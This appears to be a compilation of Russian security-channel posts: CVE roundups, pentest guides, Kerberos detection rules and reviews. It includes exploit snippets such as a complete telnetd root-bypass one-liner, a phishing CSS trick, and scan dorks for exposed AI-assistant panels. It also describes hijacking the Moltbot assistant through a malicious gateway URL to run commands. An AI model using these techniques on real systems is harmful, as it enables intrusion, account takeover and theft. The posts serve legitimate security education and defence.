📈   #наработки #defense #offense #web #web3

▶️Не так давно мы с вами обсудили дрейнеры в блокчейне TON; Тогда же мы c командой Neplox обратили внимание на особенности работы TON Connect — протокола для коммуникации dApp 🔄 кошельки; А теперь – подробнее, в новой статье:

   🧩   ‟TON't Connect! NOTe on securing TON Wallets” (@neploxaudit)


⌨️ Вот так веб-приложения подключают TON Connect:

const tonConnectUI = new TonConnectUI({
    buttonRootId: '<ID>',
    manifestUrl: 'https://neplox.security/tonconnect-manifest.json',
    ...
});

⌨️ Вот так они рассказывают о себе кошелькам через манифест, tonconnect-manifest.json:

{
    "url": "https://neplox.security",
    "name": "Neplox dApp",
    "iconUrl": "https://neplox.security/icons/neplox.svg"
    ...
}

▶️Заметили, что кошельки полагаются на информацию, предоставляемую [потенциально вредоносными!] приложениями в манифестах:

Некоторые – не предупреждают пользователей об опасностях, некоторые – недостаточно нормализуют данные, в связи с чем оказываются уязвимы; Сообщили вендорам, а теперь – вам!

1️⃣ Wallet impersonation:
Особенности протокола, благодаря которым возможна подделка кошелька➡️вектор для правдоподобного фишинга ❗️

2️⃣ DApp impersonation:
Особенности протокола, благодаря которым вредоносные приложения успешно притворяются легитимными;

3️⃣ Redirects from trusted context:
Недостатки реализации кошельков, из-за которых пользователи доверяют приложениям;

4️⃣ UI Redressing:
Перерисовка UI кошельков из-за некорректного парсинга манифестов➡️вектор для Clickjacking ❗️

5️⃣ XSS:
Внедрение полезной нагрузки в контекст кошельков из-за некорректного парсинга манифестов➡️взаимодействие с хранилищами / API вызовы / утечка данных / утечка средств / ... ❗️

//   Время чтения: ~20 минут

➡Enjoy!  🙇‍♂


   @HaHacking  🐇

📬 #заметки #инструменты #web #infrastructure #ad #enumeration #offense

➡Объёмное руководство по пентесту Outlook Web Access (OWA) — однозначно пригодится всем, кто проводит работы по безопасности над корпоративной сетью;


   🧩   ‟OWA Pentest Guide” (@pentestnotes)


Здесь – собран большой спектр действительно нужной информации, включая готовые скрипты и инструменты, которая пригодится на всех этапах от разведки и сбора информации до экспулатации уязвимостей OWA / MS Exchange:


✉️ Outlook Web Access:

▪️Password Spraying
▪️Global Address List (GAL) / Offline Address Book (OAB) (swarm.ptsecurity.com/attacking-ms-exchange-web-interfaces)
▪️NSPI (github.com/mhaskar/ExchangeFinder)
▪️ActiveSync (EAS) — github.com/snovvcrash/peas
▪️ZDI-CAN-22101 — SSRF в CreateAttachmentFromURI (trendmicro.com/.../ssrf-exchange-owa)
▪️OWA CAP Bypass
▪️CVE-2020-0688

✉️ MS Exchange:

▪️ProxyLogon
(CVE-2021-26855 – Pre-auth SSRF, CVE-2021-27065 – Post-auth Arbitrary-File-Write)

▪️ProxyOracle
(CVE-2021-31196 – The Padding Oracle, CVE-2021-31195 – XSS и обход HttpOnly)

▪️ProxyShell
(CVE-2021-34473 – Pre-auth Path Confusion leads to ACL Bypass, CVE-2021-34523 – Exchange PowerShell Backend Elevation-of-Privilege, CVE-2021-31207 – Post-auth Arbitrary-File-Write)

▪️ProxyRelay
(фронтенд Exchange, бекенд Exchange, Windows DCOM)

▪️PrivExchange
(NTLM relaying machine accounts, Проведение атаки с повышением привилегий, Relaying to LDAP and signing, Атака без использования учётных данных)

➡По полезным ресурсам и заметкам из руководства, хочется отметить следующие:

 
  🧩   Презентация ‟Социотехническое тестирование: цели, методы, инструменты” (Я. Бабин)

   🧩 busterb/msmailprobe — time-based атаки подбора логинов для Office 365 / MS Exchange;

   🧩 FaLLenSKiLL1/ru_names_wordlists — словари RU юзернеймов в разных форматах (+ дополнительные: тут, в нашем посте);

▪️ ФамилияИмя / ИмяФамилия
▪️ Фамилия.Имя / Имя.Фамилия
▪️ Фамилия-Имя / Имя-Фамилия
▪️ Фамилия_Имя / Имя_Фамилия


   🧩 Шаблоны Nuclei для автоматической идентификации и эксплуатации представленных уязвимостей:

▪ cyberheartmi9/Proxyshell-Scanner
▪ projectdiscovery/nuclei-templates/issues/5602
▪ projectdiscovery/nuclei-templates/.../CVE-2021-26855.yaml
▪ projectdiscovery/nuclei-templates/.../CVE-2021-34473.yaml
▪ projectdiscovery/nuclei-templates/issues/2395

➡️Ещё по теме: вспомнила неплохую технику сокрытия предупреждения о "ВНЕШНЕМ ОТПРАВИТЕЛЕ" для Office365, Outlook и OWA, которое встраивается в письма с других доменов:

   🧩   ‟External Email Warning Bypass”
   🧩 knavesec/570...7b59

Идея сводится к внедрению CSS стилей в HTML письма, чтобы покрасить в белый цвет всё, кроме определённых элементов:

<!DOCTYPE html>
<html>
<head>
   <title></title>
   <style type="text/css">
      body  {
         display: none !important;
         background:#FFFFFF !important;
      }
      .PAYLOAD {
         display: block !important;
      }
      ... {
         display: none !important;
         background:#FFFFFF !important;
      }
   </style>
</head>
<body>
   <p class="PAYLOAD">Hi! I hope this email finds you well! Please have a look at the attached file ASAP</p>
</body>
</html>

   @HaHacking  🐇 [✉]

🧪 #заметки #web #offense #defense

➡️Наконец имеем базу знаний по безопасности веб-приложений на русском языке! Основана она на базе и фундаменте – Web Security Academy от PortSwigger, потому и темы соответствующие;


   🧩   ‟Веб Секурити Академия” (@wr3dmast3rvs)


• SERVER-SIDE

▪️ SQL Injection
▪️ Аутентификация
▪️ Path Traversal
▪️ OS Command Injection
▪️ Уязвимости бизнес-логики
▪️ Раскрытие информации
▪️ Контроль доступа
▪️ Загрузка файлов
▪️ Race Conditions
▪️ SSRF
▪️ XXE Injection
▪️ NoSQL Injection
▪️ Тестирование API
▪️ Web Cache Deception

• CLIENT-SIDE

▪️ XSS
▪️ CSRF
▪️ Мисконфигурации CORS
▪️ Clickjacking / UI Redressing
▪️ DOM-based уязвимости
▪️ Тестирование WebSocket

• ADVANCED

▪️ Необходимые навыки
▪️ Небезопасная десериализация
▪️ Атаки на LLM
▪️ Тестирование GraphQL
▪️ SSTI
▪️ Web Cache Poisoning
▪️ Host Header Attacks
▪️ HTTP Request Smuggling
▪️ Тестирование OAuth
▪️ Атаки на JWT
▪️ Prototype Pollution


➡️Кстати, когда-то давно собирала для вас ресурсы для подготовки к сдаче тематического экзамена, Burp Suite Certified Practitioner (BSCP) – свою актуальность они не теряют:

Сборники информации:

🔖 DingyShark/BurpSuiteCertifiedPractitioner
🔖 botesjuan/Burp-Suite-Certified-Practitioner-Exam-Study


Райтапы лабораторий:

📖 frank-leitner/portswigger-websecurity-academy
📖 thelicato/portswigger-labs

➡Решали лабы Web Security Academy?
Сделайте доброе дело – докиньте свои райтапы в базу! 🦸‍♂️


   @HaHacking  🐇 [🍊]

🫥 #инструменты #заметки #defense #offense #devsecops #infrastructure #ad

➡️Говоря о защите инфраструктуры, непременно вспоминаются следующие работы @castercanal за этот год, все из которых основаны на глубоком анализе сетевого трафика / пакетов / байтовых последовательностей:


❤️   ACTIVE DIRECTORY

   🧩   ‟Seen It All” — атаки на Active Directory➕их обнаружение через Suricata IDS;

▪️ LLMNR / NBT-NS / mDNS Poisoning
▪️ IPv6 Takeover
▪️ AS-REP Roasting
▪️ Impacket / Rubeus


🌟   KERBEROS

   🧩   ‟Parallax” — атаки на протокол Kerberos➕их обнаружение через Suricata IDS;

▪️ Kerberos Enumeration

alert tcp any any -> any 88 (
msg:"[TCP] High Rate of Kerberos AS-REQ, Possible Enumeration";
content:"|a1 03 02 01 05 a2 03 02 01 0a|";
content:"|6b 72 62 74 67 74|";
fast_pattern;
threshold:type limit, track by_src, count 5, seconds 10;
sid:100001;
rev:1;
)


▪️ Kerberos Bruteforce

alert tcp any any -> any 88 (
msg:"[TCP] High Rate of Kerberos AS-REQ with PA-DATA, Possible Bruteforce or Spray Attack";
content:"|a1 03 02 01 05 a2 03 02 01 0a|";
content:"|a1 03 02 01 02|";
content:"|6b 72 62 74 67 74|";
fast_pattern;
threshold:type limit, track by_src, count 5, seconds 10;
sid:100004;
rev:1;
)


▪️ Kerberoasting
#️⃣ Поиск подходящих пользователей:

alert tcp any any -> any 389 (
msg:"Searching Kerberoastable users via LDAP - Possible Kerberoasting";
flow:to_server, stateless;
content:"|a3 18 04 0e 6f 62 6a 65 63 74 43 61 74 65 67 6f 72 79 04 06 70 65 72 73 6f 6e|";
content:"|87 14 73 65 72 76 69 63 65 50 72 69 6e 63 69 70 61 6c 4e 61 6d 65|";
content:"|a2 31 a9 2f 81 16 31 2e 32 2e 38 34 30 2e 31 31 33 35 35 36 2e 31 2e 34 2e 38 30 33 82 12 75 73 65 72 41 63 63 6f 75 6e 74 43 6f 6e 74 72 6f 6c 83 01 32|";
fast_pattern;
sid:100004;
rev:1;
)

#️⃣ Для отлова подозрительных TGS-REQ:

alert tcp any any -> any 88 (
msg:"[TCP] Suspicious Kerberos TGS-REQ — stage 1";
flow:to_server;
content:"|a1 03 02 01 05 a2 03 02 01 0c|";
fast_pattern;
content:"|6b 72 62 74 67 74|";
content:"|a0 07 03 05 00 40 81 00 10|";
content:"|a0 03 02 01 17|";
content:"|30 23 a0 04 02 02 ff 80|";
flowbits:set,kerb.tgsreq.rc4;
noalert;
sid:100006;
rev:1;
)

#️⃣ Для отлова ответа TGS-REQ:

alert tcp any 88 -> any any (
msg:"[TCP] Kerberos TGS-REP after SPN request — Possible Kerberoasting";
flow:to_client;
content:"|a0 03 02 01 05 a1 03 02 01 0d|";
fast_pattern;
content:"|a0 03 02 01 17|";
flowbits:isset,kerb.tgsreq.rc4;
flowbits:unset,kerb.tgsreq.rc4;
sid:100008;
rev:1;
)


▪️ AS-REP Roasting

alert tcp any any -> any 88 (
msg:"Suspicious AS-REQ Packet, Possible AS-REP Roasting";
flow:to_server, stateless;
content:"|a0 07 03 05 00 50 80 00 00 a1|";
content:"|6b 72 62 74 67 74|";
fast_pattern;
content:!"|a1 03 02 01 02|";
sid:100009;
rev:1;
)

❤️ БЕЗОПАСНОСТЬ IPv6

   🧩   caster0x00/Ibex
   🧩   ‟Legless”  — атаки на IPv6:  подробный разбор и удобная эксплуатация через интерактивный тулкит Ibex➕способы обнаружения таких атак;

▪️ Сетевые настройки ядра
▪️ Spoofing роутера и DNS через RA Spoofing
▪️ RDNSS Spoofing
▪️ DHCPv6 Spoofing
▪️ Атаки через mitm6

#web

💬 Если посмотреть из-под другого угла: когда-то поднимался вопрос корректности реализации парсинга IPv6 в разных ЯП + вытекающих уязвимостей — подробнее в статье @slonser_notes:

   🧩  ‟Exploring IPv6 Zone Identifier”

▪️ Обход белого списка поддоменов
▪️ Инъекция с обходом формата URL
▪️ Инъекция произвольных команд
▪️ Инъекция CRLF-конструкций
▪️ Внедрение XSS пейлоада
▪️ Обход чёрного списка IP адресов
▪️ Использование особенностей для SSRF
▪️ . . .

   @HaHacking  🐇 [📼]

🌐  #заметки #web #offense

➡️База знаний extensions.neplox.security — единый ресурс о безопасности расширений для Chrome➕браузеров на базе Chromium:


   🧩   ‟Chrome Extension Security”  (@slonser_notes)


Много чего сказано про заведомо вредоносные расширения, гораздо меньше – про уязвимости легитимных расширений, хотя они обычно включены в скоуп багбаунти программ.

Эта база  (вместе с докладом ‟Атакуем криптокошельки: свежий взгляд на безопасность браузерных расширений” с PHDays 2025➕слайдами оттуда)  закрывает потребность в информации по теме:


ℹ️ Проводит за руку от структуры браузерных расширений + теоретической информации, необходимой для создания собственного расширения;

ℹ️ До релевантных векторов атаки:

   ▪ Эксплуатация addEventListener
   ▪ Эксплуатация коммуникации
   ▪ Эксплуатация Shadow DOM
   ▪ Clickjacking / UI Redressing
   ▪ Небезопасные хранилища➡️Universal XSS ⚡️

#web3 #события

На днях Trust Wallet выпустил обновление своего браузерного расширения – версию 2.68,  с бекдором:

0️⃣ Пользователь разблокировал кошелёк➡️бекдор получает password / passkeyPassword
1️⃣ Бекдор вызывает GET_SEED_PHRASE➡️получает зашифрованную секретную фразу
2️⃣ password / passkeyPassword используется для дешифровки фразы
3️⃣ Секретная фраза записывается в тело ошибки, errorMessage
4️⃣ Через инструмент для аналитики PostHog "ошибка" с фразой улетает на вредоносный api[.]metrics-trustwallet[.]com


Вторым слоем иронии послужил fix-trustwallet[.]com – сосед предыдущего домена, который просил пользователей ввести секретную фразу для "обновления кошелька до безопасной версии";

Третьим – волна фишинга для "восстановления средств";


Предварительно известно, что версия 2.68 не проходила стандартные внутренние процессы публикации, а была выложена сразу в Chrome Web Store с помощью их [утёкшего?] API ключа.

Такие вот дела в мире безопасности расширений!

➡Есть чем дополнить базу?
Пожалуйста, сделайте доброе дело – дополните!  🦸‍♂


   @HaHacking  🐇 [🥨]

📚 #литература

➡️НЕ рейтинг, но обзор! Книг за этот год: от образовательных до развлекательных, но обязательно – по теме ИБ;


📖 «Windows глазами хакера»
📧 М. Жмайло, @RedTeambro❌@xakep_ru
ℹ️ #infrastructure #ad #offense
🔖 Маркетплейсы / "БХВ"

Возможно, прозвучит громко, но всё же — это та книжка, что должна стоять на полке у каждого внутрянщика; Аж ± 460 страниц чистой техники с упором на "нападение": необходимая теоретическая база для понимания атак➕практическая демонстрация атак на компоненты системы.

Из оглавления:

▪️ Атаки на доверенные отношения доменов и лесов AD
▪️ Эксплуатация небезопасных групповых политик
▪️ Пентест Read-only Domain Controller'ов

▪️ Привилегии в Windows
▪️ Извлечение учётных данных➕кража сессий
▪️ Обход UAC

▪️ Методы дампа тикетов➕Ручная инъекция тикетов
▪️ WinAPI для пентестеров➕Обфускация вызовов
▪️ Обращение к нативному коду➕Варианты исполнения стороннего кода

▪️ ...

📖 «Хакерская самооборона»
📧 А. Жуков, @s0i37_channel
ℹ️ #infrastructure #ad #defense
🔖 Маркетплейсы / "БХВ"

[Совсем свежо! Потому лично не ознакомлена, но судя по предыдущим работам автора — в качестве сомневаться не приходится]

Техническая книга о защите инфраструктуры от атак, внутри которой 2 части (Внешний нарушитель + Внутренний нарушитель) & 2 стороны (Хакер / Абстрактная компания): обнаружение и анализ атакующего, противодействие хакерской разведке, выявление атак и противостояние им.

Из оглавления:

▪️ Атаки из Интернета:
что ищет хакер? где он? какие у него ресурсы? как противодействовать?

▪️ Атаки в радиоэфире:
обнаружение + противодействие (деаутентификации, PMKID, брутфорсу, Evil Twin, GTC downgrade, KARMA)

▪️ Атаки в локальной сети:
обнаружение снифферов, сканирования, перехвата трафика, вредоносных серверов, NetBIOS спуфинга, NTLM-relay + размещаем honeypot'ы

▪️ Атаки в AD:
обнаружение атак на пользователей / хосты / групповые политики / группы / ...

📖 «На⭐️уй безопасность»
📧 George K., @ever_secure
ℹ #devsecops #defense
🔖 eversecure.ru / бета-версия

С юмором о наболевшем, но с пользой для проектов: обзор проблем безопасности в рамках жизненного цикла разработки ПО с точки зрения того, кому придётся с этими проблемами разбираться;

Здесь про: организацию процессов, инциденты, харденинг инфраструктуры, код-ревью и написание тестов, буковки QA, SAST, SCA, OSA, ...


📖 «Вирьё моё!»
📧 Гайка Митич & Бойко Двачич
ℹ️ #malware #forensics #defense
🔖 Маркетплейсы / "Читай-город" / "Эксмо"

Реальные истории, громкие инциденты и вредоносные кампании, но красивыми словами, и внезапно со стороны "защиты" – вирусных аналитиков;

Здесь [популярно] про: эволюцию вредоносного ПО, инфицирование компьютерными червями Stuxnet КИИ + Carbanak банков, шпионское ПО DarkHotel, троян Turla / Uroboros, операцию "Триангуляция", ...


📖 «Хакеры[.]RU»
📧 В. Холмогоров, @xakep_ru
ℹ️ #malware #offense
🔖 xakep.shop / author.today

Художественное произведение на случай, если захочется разгрузить голову от взрослых задач и взамен ощутить себя подростком в 00-х: та самая романтика "андерграунда", форумов со всем им причитающимся и, конечно, трудностями юности – куда ж без этого?

Займёт пару вечеров, но сделает тепло на душе!


➡Приятного чтения!  👍

   @HaHacking  🐇 [📖]

⚠️ #заметки #события #offense #infrastructure #web

➡️НЕ рейтинг (боже упаси), но обзор! Самые громкие CVE за год: те, что заработали высокий CVSS, и те, что просто вызвали эмоции;


🐰 React2Shell / React Server Unauth RCE ⚡️
ℹ️ CVE-2025-55182 / CVE-2025-66478 / ...

В связи с небезопасной десериализацей: запрос со специально сформированным объектом➡️Unauth RCE на тысячах хостов;

crafted_chunk = {
    "then": "$1:__proto__:then",
    "status": "resolved_model",
    "reason": -1,
    "value": '{"then": "$B0"}',
    "_response": {
        "_prefix": f"██████;",
        "_formData": {
            "get": "$1:constructor:constructor",
        },
    },
}

files = {
    "0": (None, json.dumps(crafted_chunk)),
    "1": (None, '"$@0"'),
}

▪️ Пост @HaHacking с разбором!
▪️ react2shell.com
▪️ github.com/msanft/CVE-2025-55182
▪️ Оригинальный PoC от автора
➕ Очень детальный анализ


🐰 FortiWeb: RCE Chain
ℹ️ CVE-2025-64446➕CVE-2025-58034

CVE-2025-64446 — Path Traversal в Apache➕CGI Auth Bypass➡️Unauth создание административных аккаунтов;

POST /api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi
CGIINFO: <CGIINFO>

{"data": {██████}}

CVE-2025-58034 — Auth исполнение произвольных системных команд; Вместе с CVE-2025-64446➡️цепочка для RCE;

▪️ Статья-обзор, CVE-2025-64446
▪️ Статья-обзор, CVE-2025-58034


🐰 Grafana PrivEsc
ℹ️ CVE-2025-41115

Из-за некорректного маппинга идентификаторов в SCIM возможна подмена externalId / создание пользователя с externalId=1➡️коллизия, вход под любым пользователем / администратором;

POST /api/scim/v2/Users

{"schemas": ["urn:ietf:params:scim:schemas:core:2.0:User"], "externalId": ██████, ...}

🐰 pgAdmin RCE
ℹ️ CVE-2025-2945, CVE-2025-13780

CVE-2025-2945 — для обработки запросов в модулях Query Tool / Cloud Deployment использовался eval()➡️Auth RCE: py0zz1.tistory.com/.../Remote-Code-Execution-Vulnerability-in-pgAdmin-CVE-2025-2945;

POST /sqleditor/query_tool/download/<ID>
{"query_commited": "██████"}

POST /cloud/deploy
{"high_availability": "██████"}

CVE-2025-13780 — Regex для блокировки опасных метакоманд в PLAIN-дампах не учитывал некоторые последовательности (\r, \x0B, \x0C, \xEF\xBB\xBF, ...)➡️RCE;

▪️ Статья-обзор
▪️ github.com/zeropwn/pgadmin4-9.10-CVE-2025-13780


🐰 ASP[.]NET Core HTTP Request Smuggling
ℹ️ CVE-2025-55315

Всё по заветам ‟HTTP/1.1 must die” от James Kettle — благодаря особенностям протокола + недостаточной фильтрации➡️HTTP Request Smuggling;

Например, вот этот запрос вернёт xy:

POST /Echo HTTP/1.1
Host: <HOSTNAME>
Transfer-Encoding: chunked
Content-Type: text/plain

2;\n
xx\r\n
xy\r\n
0\r\n
\r\n

▪️ Статья-обзор от автора
➕ Очень детальный анализ


🐰 RediShell / Redis Lua Auth RCE
ℹ️ CVE-2025-49844

13 лет томилась в кодовой базе, чтобы в этом году выстрелить: из-за особенностей работы со стеком, обработка специального скрипта может привести к Use-After-Free➡️выход из песочницы Lua, RCE:

▪️ Статья-обзор
▪️ github.com/raminfp/redis_exploit


🐰 MongoBleed / MongoDB Unauth Memory Leak
ℹ️ CVE-2025-14847

Отправка специальных сообщений с увеличенными значениями длины, чтобы сервер выделил побольше памяти (верит на слово, несмотря на размер после разжатия) + без \0, чтобы не заканчивал читать➡️утечка памяти в ответе;

▪️ Статья-обзор
▪️ PoC, опубликованный на Рождество исследователями из Elastic


🐭 1C-Bitrix / Bitrix24 Translate Auth RCE
ℹ CVE-2025-67886 / CVE-2025-67887 (???)

Содержимое архивов, загружаемых в модуль, недостаточно проверялось: возможно добавление специального .htaccess + PHP-файла с web shell➡Auth RCE;

Но есть нюанс — "Auth" серьёзный, по сути административный😊 А был ли мальчик?

▪ karmainsecurity.com/KIS-2025-07
▪ karmainsecurity.com/KIS-2025-08


➡️Stay safe!

   @HaHacking  🐇 [🍬]

🐰  #события

➡️✨🍎 С наступающим Новым годом! 🌟✨

Дорогие друзья, поздравляю с праздником нас, вас и ваших близких! Ну и с долгожданными выходными днями, конечно же;

//  В этом году без градостроительства, как в 2023–2024, и арт-выставок, как в 2024–2025 —  такова воля богов, но будем сегодня в завтрашний день смотреть;

Зато есть список книг за год, список прогремевших CVE и тёплые слова!

От лица @HaHacking хочу пожелать каждому из вас замечательнейшего праздника сегодня:

   ✅  Вкуснючих блюд!
   ✅  Отличного настроения!
   ✅  0 страшных инцидентов
   ✅  0 срочных рабочих задач
   ✅  0 гномов-отчётокрадов

➡️Начиная смотреть в завтрашний день:  пусть новый год откроет для нас новые горизонты, чтоб нам было что исследовать, и чтобы это исследование приносило лишь положительные эмоции и всевозможные блага!

⢀⠀⠀⠀⠀⠀⠈  .⠈ ⠀ .⠀⠈⠀⠀⢀    ⠈.     ⠁
⠀⠀.⢀ ⠁  ⠁⠀⠀⠀⢀⠀⠀⡰⡇⠁⠀  ⠁      ⠁  .
⠀⠀⠀⠀     ⠀⠀⠀⠀⠰⢾⠇⠨⡦⠀⠂⠀        ⢀
⢀⠀⠀⠀  ⠁  ⠀⠀⡀⠀⢈⣹⠜⠻⢾⠃      ⢀.    
⠀⠀⢀     ⠀⠀⠀⠁⢠⣿⡵⠾⣻⣶⠿⠦⠀          ⢀
⠀⢀     ⠀⠁⢀⠀⢀⣠⣮⣦⡶⠻⠛⢶⣄⡀⠁     ⠁
⠀      ⠀⠀⠀⢀⣽⠏⠁⣠⣂⣦⣈⣝⣦⣄⠀ ⠀       ⢀
       ⠀⠀⠀⠁⣠⣾⣵⣾⣾⠟⡙⠟⠿⣍⡉⠀⠀⢀
⢀⠁  ⠀⢀⠁⠀⠄⣠⣶⣾⣭⡶⠟⠻⣶⡰⣜⣳⣦⣄⠀⡀    ⠁⢀
      ⠀⠀ ⢀⣠⣴⣿⣋⡴⣪⠎⣄⡙⠻⠿⣯⣉⠉
     ⠀⠂⠀⢀⣉⡭⢿⡛⣛⣵⠎⠀⠙⢾⣶⣦⣭⣷⣦⠐   ⢀
⠁   ⠀ ⢈⣙⣿⡿⠿⠟⣋⢅⡄⡄⡐⣄⢤⣉⠷⢦⣄⣀⠠ 
  \\  ⠐⠾⠿⢽⣷⡶⠶⡿⣓⣭⣾⣿⢷⣬⣓⢿⠿⠿⣯⣉⣁  |/
  _() ⠀ ⠉⠉⠉⠛⠛⠉⢀⣿⢿⡀⠙⠋⠓⠿⠿⠏⠉⠉   ()_
o(_)\\ ⠀ ⠀⠀⠠⠤⠶⠾⢿⡯⠷⠶⠤⠄        //(_)o

<!-- И таких баунти, чтобы через год, в этот же день, икру можно было грести поварёшкой! -->


➡️Enjoy! 🎇

   @HaHacking  🐇 [🎀]

📠 #события #infrastructure #ad #offense

➡️Снова критические уязвимости! ⚡️

В этот раз: обход аутентификации➡️сразу к root! С публичным PoC➕использованием в природе;

CVE-2026-24061 — CVSS (v3) ~9.8, Improper Neutralization of Argument Delimiters in a Command / Argument Injection➡️Authentication Bypass в telnetd: появилась тут и была с нами 10+ лет (GNU InetUtils v1.9.3 – v2.7 / 2015 – 2025 гг.);


1️⃣ В v1.9.3 добавили возможность подставить username из переменной окружения USER, чтобы починить автовход для случаев, когда не была доступна аутентификация Kerberos.

Сервер telnetd обращается к /usr/bin/login (обычно работает из-под root)➕передаёт ему значения для входа, в том числе и USER – вместо %U:

...
char *login_invocation =
  PATH_LOGIN " -p -h %h %?T{-t %T} -d %L %?u{-u %u}{%U}"
...

...
    case 'U':
      return getenv ("USER") ? xstrdup (getenv ("USER")) : xstrdup ("");
...

2️⃣ У /usr/bin/login есть флаг -f — пропустить аутентификацию! (например, для автовхода getty)

Ему даже можно передать username / UID пользователя: login [-p] [-s shell] [-h host] [-H] [[-f] username|UID]; // Например, root 🐇


3️⃣ Значение USER не нормализуется; Возможно поместить туда дополнительные флаги для /usr/bin/login➕попросить telnet провести автовход (флаги -a / --login):

USER='-f qwqoro' telnet -a 127.0.0.1‌‎ ‎ ‎ ‎ ‎ 

🔖 seclists.org/oss-sec/2026/q1/89
🔖 safebreach.com/...-cve-2026-24061
💻 github.com/SafeBreach-Labs/CVE-2026-24061
📦 github.com/leonjza/inetutils-telnetd-auth-bypass
🛜 shodan.io/search?query=product:"telnetd"


   @HaHacking  🐇

🦞 #события #ai #offense

➡️Новости из однобуквенной соцсети: куча шума вокруг Clawdbot — ИИ-ассистент, который действительно действует как ассистент:

✅ Управляет почтой
✅ Управляет календарём
✅ Управляет заметками
✅ Управляет соцсетями
✅ Управляет мессенджерами, в т.ч. корпоративными
✅ Управляет паролями
✅ Взаимодействует с браузером
✅ Взаимодействует с системой
✅ Взаимодействует с другими ИИ!

✅ И даже круче: можно поселить его в Telegram бота!
⬜️

Удобно, что он разворачивает собственный шлюз на порту 18789➕веб-интерфейс "Clawdbot Control", который по умолчанию не требует от тебя ничего➡️сотни хостов, где можно пообщаться с Clawdbot в контексте чужих систем:

▪️Shodan: http.title:"Clawdbot Control"
▪️Shodan: http.favicon.hash:-805544463
▪️FOFA:  title=="Clawdbot Control"
▪️FOFA: icon_hash="-805544463"

✍️ На прикреплённом скриншоте показываю как оно выглядит: обнаруженный мной хост, который кто-то уже атаковал;


➡️Последствия ⬇️

⬜️
❌ Утечка конфиденциальной информации (письма, документы, пароли, API-ключи, исходный код, ...)
❌ Удалённое исполнение кода
❌ Финансовые потери
❌ Что ещё нужно? 💀
⬜️

➡️Как обезопасить ⬇️

⬜️
➖Запускать в изолированной среде (не на личной системе, где есть что терять / не на сервере, который доступен снаружи)
➖Выделить боту отдельные эл. почту / номер телефона / аккаунты / ...
➖Настроить bind: "loopback" / bind: "tailnet" вместо bind: "all" в конфигурации шлюза
➖Настроить Pairing для сопряжения пользователь➕бот в рамках мессенджеров / устройство➕бот в рамках системы
➖Настроить белые списки идентификаторов пользователей для мессенджеров
➖Настроить белый список IP
➖Повесить аутентификацию
➖Периодически менять API ключи
➖Настроить лимиты, логи, алерты
➖. . .
⬜️

Тут неприменимы полумеры: важно не забывать, что запрос может прийти и из внутренней сети; Что если его пошлёт соседнее приложение?


➡Напоследок Clawdbot оперативно сменили название на Moltbot! ⚡️

🔖 ‟hacking clawdbot and eating lobster souls”


   @HaHacking  🐇

🦞 #события #ai #web #offense

➡Простите, но продолжение; Хочется обсудить ещё несколько проблем, которые были обнаружены специалистами по безопасности в ИИ-ассистенте Clawdbot Moltbot➕которые могуть быть обнаружены вами в похожих проектах:


0️⃣ E-MAIL SPOOFING

🔖 x.com/slonser_/status/2016114641105998086

Помните ресерч @slonser_notes про проблемы парсинга в почтовых сервисах / библиотеках — ‟Old new email attacks”? Вот ещё один вариант его применения: судя по посту, вектор примерно такой ⬇️

⬜️
▪️ X➡️Y: ✉️
▪️ Moltbot: парсит ✉️ от X➡️передаёт Y

⚡️ НО из-за некорректного парсинга специально сформированного письма Moltbot пишет Y, что письмо пришло от, например, Z

▪️ Y отвечает через Moltbot, думая, что отвечает Z➡️ответ получает X
⬜️

1️⃣ НАКРУТКА СТАТИСТИКИ

🔖 ‟eating lobster souls Part II: the supply chain”

У Moltbot есть собственный Open-Source "магазин" навыков – ClawdHub MoltHub. Когда кто-то устанавливает навык, происходят следующие вызовы:

▪️ downloadZip: собирает навык, формирует архив, вызывает increment;
▪️ increment: делает +1 к статистике по скачиваниям навыка;

*️⃣ Нет: лимитов / привязки к пользователю;
*️⃣ Есть: в других местах – такая проверка IP ⬇️

// convex/httpApiV1.ts:695-704
function getClientIp(request: Request) {
  const header =
    request.headers.get('cf-connecting-ip') ??
    request.headers.get('x-real-ip') ??
    request.headers.get('x-forwarded-for') ??
    request.headers.get('fly-client-ip')
  if (!header) return null
  if (header.includes(',')) return header.split(',')[0]?.trim() || null
  return header.trim()
}

➡️ Проверка IP адреса доверяет заголовку X-Forwarded-For: значит, перебирая значения заголовка, возможно заставить магазин думать, что установки навыка были "уникальными" — злоумышленник может создать вредоносный навык➕без труда вывести его в топ по скачиваниям ⚡️


2️⃣ XSS через SVG

🔖 ‟eating lobster souls Part III (the finale)”

Наконец, при загрузке навыка в MoltHub, магазин сохраняет информацию о том, какой был указан Content-Type:

// convex/httpApiV1.ts:555-564
const contentType = file.type || undefined‎ ‎ ‎ 

Сохраняет настолько, что при выгрузке навыка пользователем, ему возвращается ровно такой же Content-Type:

// convex/httpApiV1.ts:377-386
'Content-Type': file.contentType‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ 

*️⃣ Нет: фильтрации / санитизации / CSP / отдельного домена для загрузок / ...;
*️⃣ Есть: MoltHub хранит authToken / authRefreshToken / ... в localStorage;

➡️ Если загрузить в навык SVG, внутри которого – XHTML с полезной нагрузкой для эксплуатации XSS, отображение SVG приводило к выполнению JS кода атакующего в контексте clawdhub.com, где явно есть что эксплуатировать➕эксфильтровать ⚡️


3️⃣ 1-CLICK RCE

🔖 ‟One-click RCE on Clawd/Moltbot”
🔗 github.com/ethiack/moltbot-1click-rce

А тут сюр [в хорошем смысле]: ИИ нашёл уязвимость в ИИ (Hackian / Moltbot);

⬜️
В пути к "Clawdbot Control" можно передать параметр gatewayUrl, ссылающийся на WebSocket: {DASHBOARD}/chat?gatewayUrl=wss://{GATEWAY}/gw

▪ Предыдущее значение gatewayUrl переписывается
▪ На новый gatewayUrl сразу приходят токены из localStorage
▪ Далее API запросы будут летать по новому пути;
⬜️

➡ Пользователь может попасть на вредоносный сайт, который будет открывать окно с {DASHBOARD}/chat?gatewayUrl=wss://{MALICIOUS-GATEWAY}/gw➕окно, в котором [после получения токена] произойдёт валидация токена и открытие сессии с ботом, у которого запросят удалённое выполнение команд ⚡


➡Stay safe!

   @HaHacking  🐇